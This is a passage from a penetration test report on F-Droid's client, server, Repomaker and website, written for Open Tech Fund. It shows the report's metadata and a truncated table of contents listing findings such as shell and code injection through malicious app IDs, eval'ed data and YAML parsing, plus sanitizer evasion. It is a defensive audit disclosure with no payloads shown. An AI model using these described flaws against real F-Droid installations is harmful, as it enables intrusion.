-
-
Notifications
You must be signed in to change notification settings - Fork 5
/
Second_Audit_Report.html
1389 lines (1299 loc) · 323 KB
/
Second_Audit_Report.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
---
layout: page
title: Second Audit Report
---
<br><div valign="top"><div><div style="margin-bottom: 1.3cm;"><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Client</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Open Tech Fund</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Title</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Penetration Test Report</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Targets</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><div>F-droid Client</div><div>F-droid Privileged Extension</div><div>F-droid Repomaker</div><div>F-droid Server</div><div>F-droid Website</div></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Version</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>1.0</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Pentesters</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span>, <span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Authors</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span>, <span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span>, <span>Patricia Piolon</span></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Reviewed by</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><div>John Sinteur</div></div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Approved by</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Melanie Rieback</div></td></tr></tbody></table></div><div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Version control</div><div style="margin-bottom: 1.3cm;"><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Version</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Date</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Author</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Description</div></td></tr><tr style="background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> 0.1</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>March 2nd, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Stefan Marsiske</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Initial draft - python code audit targets</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> 0.2</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>April 16th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Abhinav Mishra</span>, <span>Mahesh Saptarshi</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Final draft for review after adding all issues from code audit and pen-test</div></td></tr><tr style="background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> 0.3</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>August 29th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Patricia Piolon</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cleaned up xml, fixed some errors</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>1.0</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>August 29th, 2018</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><span>Patricia Piolon</span></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Finalizing</div></td></tr></tbody></table></div><div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Contact</div><div style="margin-bottom: 5pt; line-height: 6mm; margin-left: 0;">For more information about this
document and its contents please contact Radically Open Security B.V.</div><div><table style="border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody style="border-color: #444444; border-width: 1pt; border-style: solid;"><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Name</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Melanie Rieback</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Address</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Overdiemerweg 28</div><div>1111 PP Diemen</div><div>The Netherlands</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Phone</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>+31 (0)20 2621 255</div></td></tr><tr style="border-color: #444444; border-width: 1pt; border-style: solid;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Email</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>[email protected]</div></td></tr></tbody></table></div><div style="font-size: 9pt; text-align: center; margin-top: 15px; color: #999999;">Radically Open Security B.V. is registered at the trade register
of the Dutch chamber of commerce under number 60628081.
</div><div style="color: #e2632a; font-family: Helvetica; font-size: 18pt; margin-bottom: 0.7cm;">Table of Contents</div><div><div><table valign="top"><tbody>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary"><span>1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary">Executive Summary</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#executiveSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#introduction"><span>1.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#introduction">Introduction</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#introduction"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scope"><span>1.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scope">Scope of work</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#scope"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#objectives"><span>1.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#objectives">Project objectives</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#objectives"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#timeline"><span>1.4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#timeline">Timeline</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#timeline"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#resultsinanutshell"><span>1.5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#resultsinanutshell">Results In A Nutshell</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#resultsinanutshell"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findingSummary"><span>1.6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findingSummary">Summary of Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#findingSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#recommendationSummary"><span>1.7</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#recommendationSummary">Summary of Recommendations</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#recommendationSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#dataSummary"><span>1.8</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#dataSummary">Charts</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#dataSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#threatlevelpie"><span>1.8.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#threatlevelpie">Findings by Threat Level</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#threatlevelpie"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#typepie"><span>1.8.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#typepie">Findings by Type</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#typepie"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#methodology"><span>2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#methodology">Methodology</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#methodology"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#planning"><span>2.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#planning">Planning</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#planning"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#riskClassification"><span>2.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#riskClassification">Risk Classification</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#riskClassification"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#recon"><span>3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#recon">Automated Code Scans</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#recon"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scans"><span>3.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#scans">Automated Scan Tools</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#scans"><span>•</span></a></div></td></tr>
<tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#techSummary"><span>4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div style="font-weight: bold; margin-top: 4mm;"><a href="#techSummary">Pentest Technical Summary</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right; font-weight: bold; margin-top: 4mm;"><a href="#techSummary"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findings"><span>4.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#findings">Findings</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#findings"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker"><span>4.1.1</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker">OTF-001 — Evasion of Bleach Sanitizer in Repomaker</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver"><span>4.1.2</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver">OTF-002 — Shell Code Injection Via Malicious Appids Into Fdroidserver</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f14-shell-code-injection-via-malicious-appids-into-fdroidserver"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing"><span>4.1.3</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing">OTF-003 — Code Injection in Fdroidserver Metadata Yaml Parsing</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f23-code-injection-in-fdroidserver-metadata-yaml-parsing"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py"><span>4.1.4</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py">OTF-004 — Infoleak in Fdroidserver Checkupdates.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f25-infoleak-in-fdroidserver-checkupdates-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"><span>4.1.5</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data">OTF-005 — Code Injection in Fdroidserver Checkupdates Through Eval'ed User Supplied Data</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"><span>4.1.6</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py">OTF-006 — Code Injection Via Malicious Appid in Fdroidserver Build.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"><span>4.1.7</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py">OTF-007 — Javascript Injection Into HTMLified Descriptions in Fdroidserver Metadata</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response"><span>4.1.8</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response">OTF-008 — Unvalidated User Input Included in Response</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f33-bluetoothserver-java-request-uri-included-in-response"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage"><span>4.1.9</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage">OTF-009 — Applicatioin uses TrustOnFirstUse (TOFU) Usage unverified signing certificate</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f39-trustonfirstuse-tofu-usage"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"><span>4.1.10</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites">OTF-010 — (fdroid Client) Exploiting "Nearby Swap" Feature to Show Malicious Prompt to Users or Redirect to Malicious Sites</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"><span>4.1.11</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py">OTF-011 — Weak Regexps Filtering XSS and Unwanted HTML Tags in Fdroidserver/lint.py</a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm; padding-right: 3pt;"><div style="text-align: right;"><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py"><span>•</span></a></div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver"><span>4.1.12</span></a></div></td><td style="margin-left: 0; margin-right: 0; padding-bottom: 1.5mm;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver">OTF-012 — Key Alias Collisions Can Lead to DoS of Publishing in 